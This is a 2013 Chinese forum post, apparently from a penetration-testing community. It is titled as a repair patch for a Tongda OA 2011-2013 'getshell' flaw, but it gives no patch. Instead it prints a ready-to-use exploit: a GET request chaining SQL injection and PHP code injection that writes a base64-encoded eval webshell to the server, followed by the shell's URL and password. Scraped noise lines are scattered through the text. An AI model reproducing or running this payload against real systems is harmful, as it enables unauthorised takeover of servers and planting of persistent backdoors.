中国网络渗透测试联盟
标题:
通达OA 2011-2013 通杀GETSHELL修复补丁
[打印本页]
作者:
admin
时间:
2013-2-4 16:19
标题:
通达OA 2011-2013 通杀GETSHELL修复补丁
此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
# b {5 U s) \6 m
% a3 ^3 y0 J) |2 j+ y8 g* K
6 z6 Z" f0 V. F$ c4 b
EXP:
+ `4 C2 F- }/ S; z: a, |
) _7 d- b$ ?8 \3 m( r7 t
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
; y, Y. T& b. `1 p& ^: W0 @
+ l4 I- a T0 h; B( B0 T0 F0 v
第二步: [GET]http://site/general/email/index.php
9 c/ S" ^! i; \4 {. ^9 }
3 [8 z0 A' N% a$ F- R+ s% e
SHELL: http://site/general/email/shell.php 密码C
6 h" {% r- `* m; I5 F
6 U3 F( m( k, _( b3 [
0 K8 K- ]% v4 \
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
8 e7 _. B' t9 z2 L6 U, T
6 A+ i: V/ N- P$ S0 b7 q- ]
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
8 U( t7 h: S: h. k2 j& a3 s+ p
/ q, b. l- K7 ^; q6 X% H
2 |+ u5 M! n7 t" r. x5 t
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2